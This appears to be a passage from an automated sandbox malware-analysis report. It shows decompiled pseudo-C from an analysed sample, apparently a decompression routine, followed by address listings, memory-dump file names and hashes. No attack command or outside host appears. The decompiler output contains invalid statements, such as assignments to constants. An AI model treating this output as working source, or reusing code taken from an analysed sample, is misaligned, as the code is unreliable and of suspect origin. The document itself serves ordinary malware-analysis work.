														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                          0x004064b8
                                                          0x004064b8
                                                          0x004064b8
                                                          0x004064b8
                                                          0x004064be
                                                          0x004064c2
                                                          0x004064c6
                                                          0x004064d0
                                                          0x004064de
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x00000000
                                                          0x00000000
                                                          0x004067f1
                                                          0x004067fa
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406848
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040684a
                                                          0x0040684a
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x004068ff
                                                          0x00406909
                                                          0x00406911
                                                          0x00406918
                                                          0x0040691a
                                                          0x00406921
                                                          0x00406925
                                                          0x00406925
                                                          0x004067cd
                                                          0x004067d3
                                                          0x004067da
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x00000000
                                                          0x004067e5
                                                          0x0040684f
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f10
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x00405f16
                                                          0x00000000
                                                          0x00405f1d
                                                          0x00405f21
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f27
                                                          0x00405f2a
                                                          0x00405f2d
                                                          0x00405f30
                                                          0x00405f34
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f3a
                                                          0x00405f3a
                                                          0x00405f3d
                                                          0x00405f3f
                                                          0x00405f40
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f48
                                                          0x00405f4b
                                                          0x00405f50
                                                          0x00405f55
                                                          0x00405f5e
                                                          0x00405f71
                                                          0x00405f74
                                                          0x00405f80
                                                          0x00405fa8
                                                          0x00405faa
                                                          0x00405fb8
                                                          0x00405fb8
                                                          0x00405fbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405fac
                                                          0x00405faf
                                                          0x00405fb0
                                                          0x00405fb0
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405f82
                                                          0x00405f86
                                                          0x00405f8b
                                                          0x00405f8b
                                                          0x00405f94
                                                          0x00405f9c
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcc
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405fee
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ff6
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406015
                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x0040603c
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x004068f3
                                                          0x00000000
                                                          0x004068f3
                                                          0x0040674a
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x00406762
                                                          0x00406765
                                                          0x00406765
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x00000000
                                                          0x00406110
                                                          0x0040608a
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x004060ec
                                                          0x00000000
                                                          0x00406322
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x00000000
                                                          0x00000000
                                                          0x0040638c
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x0040645b
                                                          0x00406446
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x00000000
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x004067c1
                                                          0x0040677c
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406771
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x004067c1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x0040657f
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f3
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x004068bd
                                                          0x00000000
                                                          0x004068bd
                                                          0x004063fd
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406403
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x004066b4
                                                          0x00406431
                                                          0x00406431
                                                          0x00000000
                                                          0x00406431
                                                          0x004066b2
                                                          0x004068e7
                                                          0x004068e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00000000
                                                          0x0040691e
                                                          0x0040676b
                                                          0x004067eb
                                                          0x004067b4

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                                                          • Instruction ID: fb01dad5a0cc1219e3999a8d2bb186b1e56f72b4220c9c95c749fe4814af579a
                                                          • Opcode Fuzzy Hash: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                                                          • Instruction Fuzzy Hash: 0CA15471D00229CBDF28CFA8C8447ADBBB1FB44305F15816AD856BB281D7785A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004066B9 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E004066B9() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
